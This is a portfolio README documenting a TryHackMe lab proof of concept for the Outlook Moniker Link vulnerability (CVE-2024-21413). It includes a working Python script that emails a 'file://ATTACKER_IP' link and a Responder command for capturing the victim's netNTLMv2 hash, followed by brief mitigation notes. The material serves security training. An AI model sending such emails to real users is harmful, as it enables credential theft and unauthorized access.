# Email exploit Moniker Link-CVE-2024-21413-Module — Documentation
**Overview:** A practical PoC demonstrating the use of a Moniker Link in an HTML email to trigger an SMB connection from Outlook, allowing capture of a victim's netNTLMv2 hash via Responder. This showcases practical skills in penetration testing, scripting, and network protocol analysis.
---
## Key Skills Demonstrated
* Python scripting for automated email delivery
* Understanding of SMB, NTLMv2, LLMNR, NBT-NS and MDNS protocols
* Responder configuration and monitoring for hash capture
* Troubleshooting Linux network/DNS configuration issues
* Crafting a controlled offensive security scenario in a lab environment
---
## PoC Workflow
1. **Setup SMB listener:** Start Responder on the attack machine to monitor SMB authentication attempts.
2. **Send crafted email:** Use a Python script to deliver an HTML email with a Moniker Link (`file://`) pointing to the attacker's SMB share.
3. **Hash capture:** When the victim clicks the link, Outlook attempts to fetch the file over SMB, and Responder captures the netNTLMv2 hash.
---
## Minimal Exploit Script
```python
# exploit.py (trimmed)
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.utils import formataddr
sender = 'attacker@monikerlink.thm'
receiver = 'victim@monikerlink.thm'
mailserver = '10.201.52.124' # THM SMTP server
password = input('Enter attacker email password: ')
html = '<p><a href="file://ATTACKER_IP/test!exploit">Click me</a></p>'
msg = MIMEMultipart()
msg['Subject'] = 'CVE-2024-21413'
msg['From'] = formataddr(('CMNatic', sender))
msg['To'] = receiver
msg.attach(MIMEText(html, 'html'))
with smtplib.SMTP(mailserver, 25) as s:
s.ehlo()
s.login(sender, password)
s.sendmail(sender, [receiver], msg.as_string())
print('Email delivered')
```
*Tip:* Replace `ATTACKER_IP` and `mailserver` before running. In the TryHackMe lab, the password is `attacker`.
---
## Running Responder
```bash
responder -I ens5
```
*Replace `ens5` with your network interface name.*
---
## Troubleshooting `/etc/resolv.conf`
Sometimes Responder fails due to broken symlinks in `/etc/resolv.conf`. Fix with:
```bash
rm -f /etc/resolv.conf
printf "nameserver 8.8.8.8
nameserver 1.1.1.1
" > /etc/resolv.conf
chmod 644 /etc/resolv.conf
cat /etc/resolv.conf
```
*Skills highlighted:* Linux troubleshooting, DNS configuration, and adapting tools to cloud/VM environments.
---
## Progress Screenshots
1. **Error / Resolv.conf Issue**:`
2. **DNS Fix Applied**:
3. **Python Email Script**:
4. **Exploit Delivery**:
5. **Victim Inbox**:
6. **Captured Victim Hash**:
---
## Tools & Commands Used
* **Responder**: SMB/LLMNR/NBT-NS/MDNS listener
* **Python3**: PoC email script execution
* **smtplib / email.mime**: Python libraries for crafting and sending emails
* Linux shell commands for DNS troubleshooting
---
## Skills Learned / Portfolio Highlight
* Network attack simulation and exploitation workflow
* Automation of social engineering vector (Moniker Link email)
* Capturing and analyzing netNTLMv2 hashes
* Cross-discipline troubleshooting: Python, networking, Windows & Linux interaction
* Documentation and workflow presentation for technical reviewers
---
## Mitigation & Defensive Notes
* Disable automatic external content in Outlook
* Block outbound SMB to untrusted networks
* Enforce SMB signing and modern authentication policies on Windows clients
---
## Attribution
Adapted from TryHackMe MonikerLink lab and original PoC by CMNatic ([GitHub](https://github.com/cmnatic))
[4.0K] /data/pocs/48af2c933a2f1be79e5a7a6e0c87a7195e1c7a72
├── [4.0K] Email exploit
│ ├── [190K] dns setup fix.PNG
│ ├── [284K] error resolv.conf.PNG
│ ├── [134K] exploit delivery.PNG
│ ├── [298K] python email script.PNG
│ ├── [227K] victime email.PNG
│ └── [415K] Victime hash.PNG
└── [3.9K] README.md
1 directory, 7 files